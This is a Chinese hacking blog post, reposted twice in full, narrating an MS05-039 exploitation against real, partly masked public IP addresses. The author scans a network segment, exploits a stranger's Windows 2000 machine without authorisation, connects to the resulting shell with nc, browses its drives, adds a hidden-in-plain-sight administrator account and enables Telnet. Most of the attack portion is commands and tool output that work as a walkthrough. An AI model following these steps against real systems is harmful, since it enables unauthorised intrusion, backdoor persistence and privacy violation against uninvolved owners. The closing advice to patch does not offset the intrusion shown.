MS05039漏洞测试手记
来源:百度文库 编辑:神马文学网 时间:2024/04/30 10:11:55
[日期: 2005-10-27 ] 来源: 天马行空小组-Iceskysl 作者: [字体:大中小]
其实MS05039这个漏洞出来也有一段时间了,一直在忙自己的事,没来得及亲自去试下到底如何,成功率到底如何~哎~都怪自己怎么这么多事,总是没时间~直到前段时间网上一朋友问了些关于这个漏洞的问题才使我决定找个时间亲自来看看这个漏洞到底如何……
首先是找工具,其实这个EXP我早就拿到了,有3个版本的,一个是我非我编辑的,一个是小榕改写的,再一个就是无敌写的了。前2个是正向溢出,而无敌的支持反向溢出,随便用哪个了,只是实验而已,我是懒得养机的,很麻烦的,自己电脑已经很好了,不需要别人的,呵呵~再就是一个扫描漏洞的工具,MS05039Scan.exe,不晓得谁写的,还是个E文版呢?不过界面和去年出的MS04011漏洞界面基本相同,没有什么差别,所以很容易上手,直接输入想检测的IP段,我也随便输入我做实验的一个IP段,这个IP段里老是落后别人的补丁,出的漏洞很久远的都能在这里找到……
扫描很快出结果,哈,一个C段网有58台有这个漏洞,真是不少啊,加上没开机的,估计漏洞率50%,截取一部分如下:
代码:
--------------------------------------------------------------------------------
IP,Hostname,NetBIOS,Status
218.***。***.1,"ALI","ALI","Vulnerable"
218.***。***.86,"PN4","PA4","Vulnerable"
218.***。***.87,"YH","YH","Vulnerable"
218.***。***.92,"WG","WG","Not vulnerable"
218.***。***.94,"ZEZ","ZEZ","Vulnerable"
218.***。***.95,"FANG","FANG","Vulnerable"
218.***。***.97,"ZRONG","ZRONG","Not vulnerable"
218.***。***.98,"呆板吧","呆板吧","Vulnerable"
218.***。***.101,"SERVER1","SERVER1","Vulnerable"
218.***。***.14,"USER14","-USER14","Not vulnerable"
…………………………
--------------------------------------------------------------------------------
看到Status显示Vulnerable的就是可以溢出的了,这么多,随便找一个吧,就找218.***。***.98这个吧,反正实验嘛,我又不做破坏,实验好了我还帮他补好漏洞的,OK,下面继续:
本人比较喜欢小榕,也正向他的路发展,所以就用小榕的来试吧……开CMD,切换到所在目录。先输入程序名ms0539来看看怎么用的~如下:
代码:
--------------------------------------------------------------------------------
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
D:\ms05039\小榕改写的版本Ms05039>ms0539
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus, Modified by netXeyes 2005.
ms0539
Type: 0-Windows 2000 sp4 English Version
1-Windows 2000 sp4 Chinese Version
--------------------------------------------------------------------------------
看到这行:ms0539
就晓得是文件名 要溢出的主机IP 要溢出的端口 类型
这个类型就在0和1之间选择,注意这个只能溢出WIN2000的机子,对XP是没作用的,我国的机子大部分都是中文的啦,就用类型1OK了。接着来:
代码:
--------------------------------------------------------------------------------
D:\ms05039\小榕改写的版本Ms05039>ms0539 218.***。***.98 123 1
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus, Modified by netXeyes 2005.
[*] connecting to 218.***。***.98:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 218.***。***.98:123
--------------------------------------------------------------------------------
OK,到这里好象是成功了,就用NC连上123这个端口回车就出现下面的SHELL了,可以看到是2000的机子,先看下用户,net user可以看到如下:
代码:
--------------------------------------------------------------------------------
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
E:\WINNT\system32>net user
\ 的用户帐户
-----------------------------------------------------------------
007 admin
Administrator Guest
命令运行完毕,但发生一个或多个错误。
E:\WINNT\system32>
--------------------------------------------------------------------------------
在来看看网络状况,自然用ipconfig -all了,如下:
代码:
--------------------------------------------------------------------------------
I:\>ipconfig -all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : 呆板吧
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet
Adapter
Physical Address. . . . . . . . . : 00-**F8-**-77-66
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 218.***。***.98
Subnet Mask . . . . . . . . . . . : 255.255.252.0
Default Gateway . . . . . . . . . : 218.***。***.254
DNS Servers . . . . . . . . . . . : 218.**.***.1
218.**.***.2
--------------------------------------------------------------------------------
恩,对,就是这个机子,我再来看看他盘里都装了些什么……
代码:
--------------------------------------------------------------------------------
E:\WINNT\system32>d:
D:\>dir
驱动器 D 中的卷是 1
卷的序列号是 38C7-0F82
D:\ 的目录
2005-06-04 16:45 Record
0 个文件 0 字节
1 个目录 25,524,781,056 可用字节
D:\>c:
C:\>dir
驱动器 C 中的卷是 RESTORE
卷的序列号是 2933-4048
C:\ 的目录
2000-09-19 08:02 DOS
1994-05-31 06:22 9,349 WINA20.386
2004-02-03 03:24 0 PQTMP.FIL
2002-09-17 08:24 1,024,016 Ghost.exe
2004-01-30 20:00 70 backup.BAT
2004-02-03 02:19 134 restore.BAT
1998-06-19 20:01 41,302 oakcdrom.sys
2004-05-20 12:54 bootdisk
2004-05-20 15:48 Config
6 个文件 1,074,871 字节
3 个目录 15,855,616 可用字节
C:\>f:
F:\>dir
驱动器 F 中的卷是 新加卷
卷的序列号是 88AC-C116
F:\ 的目录
2005-06-04 16:49 install
2005-08-09 11:49 Program File
2005-08-08 09:42 Record
0 个文件 0 字节
3 个目录 29,421,977,600 可用字节
F:\>g:
G:\>dir
驱动器 G 中的卷是 新加卷
卷的序列号是 ACDC-C9C8
G:\ 的目录
2005-06-08 12:47 Record
0 个文件 0 字节
1 个目录 525,041,664 可用字节
G:\>h::
文件名、目录名或卷标语法不正确。
G:\>h:
H:\>dir
驱动器 H 中的卷是 新加卷
卷的序列号是 2CE3-1A39
H:\ 的目录
2005-08-09 22:38 979,820,531 BACKUP.GHO
2005-08-12 23:31 Record
1 个文件 979,820,531 字节
1 个目录 524,390,400 可用字节
H:\>i:
I:\>dir
驱动器 I 中的卷是 新加卷
卷的序列号是 8CEB-856F
I:\ 的目录
2004-05-28 20:41 910,265,010 BACKUP.GHO
2005-08-08 10:03 Record
1 个文件 910,265,010 字节
1 个目录 525,303,808 可用字节
I:\>j:
系统找不到指定的驱动器。
I:\>
--------------------------------------------------------------------------------
一个一个转,我晕哈,这么多盘,C,D,E,F,G,H,I这么多,但是没装什么好玩的东西,无聊人搞这么多盘做什么,我120G都装满了,估计是个有钱人~
那就加个用户试下权限,不用试,肯定是系统权限,但是还是看看吧,反正时间还早:
代码:
--------------------------------------------------------------------------------
I:\>net user icesky /add
命令成功完成。
I:\>net localgroup administrators icesky /add
命令成功完成。
I:\>net user
\ 的用户帐户
--------------------------------------------------------------------
007 admin
Administrator Guest icesky
分子楼1
命令运行完毕,但发生一个或多个错误。
I:\>
--------------------------------------------------------------------------------
哎~好了,加个icesky的管理员,就不隐藏了,人家发现也没事,给他提个醒好了,再看看开了些什么服务:
代码:
--------------------------------------------------------------------------------
I:\>net start
已经启动以下 Windows 2000 服务:
Automatic Updates
COM+ Event System
Computer Browser
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
IPSEC Policy Agent
Logical Disk Manager
Messenger
Network Connections
NVIDIA Display Driver Service
OfficeScanNT 实时扫描
OfficeScanNT 监听程序
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry Service
Removable Storage
Rising Process Communication Center
Rising Realtime Monitor Service
RunAs Service
Security Accounts Manager
Server
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
Telephony
Windows Management Instrumentation
Windows Management Instrumentation Driver Extensio
Workstation
命令成功完成。
--------------------------------------------------------------------------------
哦,都是常见的,那再给他开个TELNET吧,很简单的啦!如下:
代码:
--------------------------------------------------------------------------------
I:\>net start telnet
Telnet 服务正在启动 .
Telnet 服务已经启动成功。
I:\>
--------------------------------------------------------------------------------
OK,搞定~别的就不看下去了,下面总结一下:
总结:从开始拿到这个漏洞的描述,我就觉得和去年的MS04011很是相似,再看到那个扫描工具后更是觉得很像,其实2者的利用几乎完全一样;溢出支持正向和反向溢出;成功后是系统权限;需要注意的一点,也就是有人问我的一点是:正向溢出成功后连上去,在SHELL里输入时是没有回显的,也就是你输入回车之前是看不到你到底输入的是什么字符和命令,这就要求你不能输错了,要不命令是不会执行的,但是当你输入回车偶就可以看到你输入的命令了,也就是说,你输入回车后才会回显你的输入和执行结果;而反向溢出得到的SHELL是可以回显的。别的就没什么了,哦~还有就是赶快打补丁,溢出成功率非常高。好象利用这个漏洞的蠕虫病毒狙击波已经开始活动了,大家千万小心~偶就不罗嗦了~
阅读:1200 次
录入:燃起一支烟
【评论 】 【推荐 】 【打印 】
其实MS05039这个漏洞出来也有一段时间了,一直在忙自己的事,没来得及亲自去试下到底如何,成功率到底如何~哎~都怪自己怎么这么多事,总是没时间~直到前段时间网上一朋友问了些关于这个漏洞的问题才使我决定找个时间亲自来看看这个漏洞到底如何……
首先是找工具,其实这个EXP我早就拿到了,有3个版本的,一个是我非我编辑的,一个是小榕改写的,再一个就是无敌写的了。前2个是正向溢出,而无敌的支持反向溢出,随便用哪个了,只是实验而已,我是懒得养机的,很麻烦的,自己电脑已经很好了,不需要别人的,呵呵~再就是一个扫描漏洞的工具,MS05039Scan.exe,不晓得谁写的,还是个E文版呢?不过界面和去年出的MS04011漏洞界面基本相同,没有什么差别,所以很容易上手,直接输入想检测的IP段,我也随便输入我做实验的一个IP段,这个IP段里老是落后别人的补丁,出的漏洞很久远的都能在这里找到……
扫描很快出结果,哈,一个C段网有58台有这个漏洞,真是不少啊,加上没开机的,估计漏洞率50%,截取一部分如下:
代码:
--------------------------------------------------------------------------------
IP,Hostname,NetBIOS,Status
218.***。***.1,"ALI","ALI","Vulnerable"
218.***。***.86,"PN4","PA4","Vulnerable"
218.***。***.87,"YH","YH","Vulnerable"
218.***。***.92,"WG","WG","Not vulnerable"
218.***。***.94,"ZEZ","ZEZ","Vulnerable"
218.***。***.95,"FANG","FANG","Vulnerable"
218.***。***.97,"ZRONG","ZRONG","Not vulnerable"
218.***。***.98,"呆板吧","呆板吧","Vulnerable"
218.***。***.101,"SERVER1","SERVER1","Vulnerable"
218.***。***.14,"USER14","-USER14","Not vulnerable"
…………………………
--------------------------------------------------------------------------------
看到Status显示Vulnerable的就是可以溢出的了,这么多,随便找一个吧,就找218.***。***.98这个吧,反正实验嘛,我又不做破坏,实验好了我还帮他补好漏洞的,OK,下面继续:
本人比较喜欢小榕,也正向他的路发展,所以就用小榕的来试吧……开CMD,切换到所在目录。先输入程序名ms0539来看看怎么用的~如下:
代码:
--------------------------------------------------------------------------------
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
D:\ms05039\小榕改写的版本Ms05039>ms0539
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus, Modified by netXeyes 2005.
ms0539
Type: 0-Windows 2000 sp4 English Version
1-Windows 2000 sp4 Chinese Version
--------------------------------------------------------------------------------
看到这行:ms0539
就晓得是文件名 要溢出的主机IP 要溢出的端口 类型
这个类型就在0和1之间选择,注意这个只能溢出WIN2000的机子,对XP是没作用的,我国的机子大部分都是中文的啦,就用类型1OK了。接着来:
代码:
--------------------------------------------------------------------------------
D:\ms05039\小榕改写的版本Ms05039>ms0539 218.***。***.98 123 1
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus, Modified by netXeyes 2005.
[*] connecting to 218.***。***.98:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 218.***。***.98:123
--------------------------------------------------------------------------------
OK,到这里好象是成功了,就用NC连上123这个端口回车就出现下面的SHELL了,可以看到是2000的机子,先看下用户,net user可以看到如下:
代码:
--------------------------------------------------------------------------------
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
E:\WINNT\system32>net user
\ 的用户帐户
-----------------------------------------------------------------
007 admin
Administrator Guest
命令运行完毕,但发生一个或多个错误。
E:\WINNT\system32>
--------------------------------------------------------------------------------
在来看看网络状况,自然用ipconfig -all了,如下:
代码:
--------------------------------------------------------------------------------
I:\>ipconfig -all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : 呆板吧
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet
Adapter
Physical Address. . . . . . . . . : 00-**F8-**-77-66
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 218.***。***.98
Subnet Mask . . . . . . . . . . . : 255.255.252.0
Default Gateway . . . . . . . . . : 218.***。***.254
DNS Servers . . . . . . . . . . . : 218.**.***.1
218.**.***.2
--------------------------------------------------------------------------------
恩,对,就是这个机子,我再来看看他盘里都装了些什么……
代码:
--------------------------------------------------------------------------------
E:\WINNT\system32>d:
D:\>dir
驱动器 D 中的卷是 1
卷的序列号是 38C7-0F82
D:\ 的目录
2005-06-04 16:45
0 个文件 0 字节
1 个目录 25,524,781,056 可用字节
D:\>c:
C:\>dir
驱动器 C 中的卷是 RESTORE
卷的序列号是 2933-4048
C:\ 的目录
2000-09-19 08:02
1994-05-31 06:22 9,349 WINA20.386
2004-02-03 03:24 0 PQTMP.FIL
2002-09-17 08:24 1,024,016 Ghost.exe
2004-01-30 20:00 70 backup.BAT
2004-02-03 02:19 134 restore.BAT
1998-06-19 20:01 41,302 oakcdrom.sys
2004-05-20 12:54
2004-05-20 15:48
6 个文件 1,074,871 字节
3 个目录 15,855,616 可用字节
C:\>f:
F:\>dir
驱动器 F 中的卷是 新加卷
卷的序列号是 88AC-C116
F:\ 的目录
2005-06-04 16:49
2005-08-09 11:49
2005-08-08 09:42
0 个文件 0 字节
3 个目录 29,421,977,600 可用字节
F:\>g:
G:\>dir
驱动器 G 中的卷是 新加卷
卷的序列号是 ACDC-C9C8
G:\ 的目录
2005-06-08 12:47
0 个文件 0 字节
1 个目录 525,041,664 可用字节
G:\>h::
文件名、目录名或卷标语法不正确。
G:\>h:
H:\>dir
驱动器 H 中的卷是 新加卷
卷的序列号是 2CE3-1A39
H:\ 的目录
2005-08-09 22:38 979,820,531 BACKUP.GHO
2005-08-12 23:31
1 个文件 979,820,531 字节
1 个目录 524,390,400 可用字节
H:\>i:
I:\>dir
驱动器 I 中的卷是 新加卷
卷的序列号是 8CEB-856F
I:\ 的目录
2004-05-28 20:41 910,265,010 BACKUP.GHO
2005-08-08 10:03
1 个文件 910,265,010 字节
1 个目录 525,303,808 可用字节
I:\>j:
系统找不到指定的驱动器。
I:\>
--------------------------------------------------------------------------------
一个一个转,我晕哈,这么多盘,C,D,E,F,G,H,I这么多,但是没装什么好玩的东西,无聊人搞这么多盘做什么,我120G都装满了,估计是个有钱人~
那就加个用户试下权限,不用试,肯定是系统权限,但是还是看看吧,反正时间还早:
代码:
--------------------------------------------------------------------------------
I:\>net user icesky /add
命令成功完成。
I:\>net localgroup administrators icesky /add
命令成功完成。
I:\>net user
\ 的用户帐户
--------------------------------------------------------------------
007 admin
Administrator Guest icesky
分子楼1
命令运行完毕,但发生一个或多个错误。
I:\>
--------------------------------------------------------------------------------
哎~好了,加个icesky的管理员,就不隐藏了,人家发现也没事,给他提个醒好了,再看看开了些什么服务:
代码:
--------------------------------------------------------------------------------
I:\>net start
已经启动以下 Windows 2000 服务:
Automatic Updates
COM+ Event System
Computer Browser
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
IPSEC Policy Agent
Logical Disk Manager
Messenger
Network Connections
NVIDIA Display Driver Service
OfficeScanNT 实时扫描
OfficeScanNT 监听程序
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry Service
Removable Storage
Rising Process Communication Center
Rising Realtime Monitor Service
RunAs Service
Security Accounts Manager
Server
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
Telephony
Windows Management Instrumentation
Windows Management Instrumentation Driver Extensio
Workstation
命令成功完成。
--------------------------------------------------------------------------------
哦,都是常见的,那再给他开个TELNET吧,很简单的啦!如下:
代码:
--------------------------------------------------------------------------------
I:\>net start telnet
Telnet 服务正在启动 .
Telnet 服务已经启动成功。
I:\>
--------------------------------------------------------------------------------
OK,搞定~别的就不看下去了,下面总结一下:
总结:从开始拿到这个漏洞的描述,我就觉得和去年的MS04011很是相似,再看到那个扫描工具后更是觉得很像,其实2者的利用几乎完全一样;溢出支持正向和反向溢出;成功后是系统权限;需要注意的一点,也就是有人问我的一点是:正向溢出成功后连上去,在SHELL里输入时是没有回显的,也就是你输入回车之前是看不到你到底输入的是什么字符和命令,这就要求你不能输错了,要不命令是不会执行的,但是当你输入回车偶就可以看到你输入的命令了,也就是说,你输入回车后才会回显你的输入和执行结果;而反向溢出得到的SHELL是可以回显的。别的就没什么了,哦~还有就是赶快打补丁,溢出成功率非常高。好象利用这个漏洞的蠕虫病毒狙击波已经开始活动了,大家千万小心~偶就不罗嗦了~
阅读:1200 次
录入:燃起一支烟
【评论 】 【推荐 】 【打印 】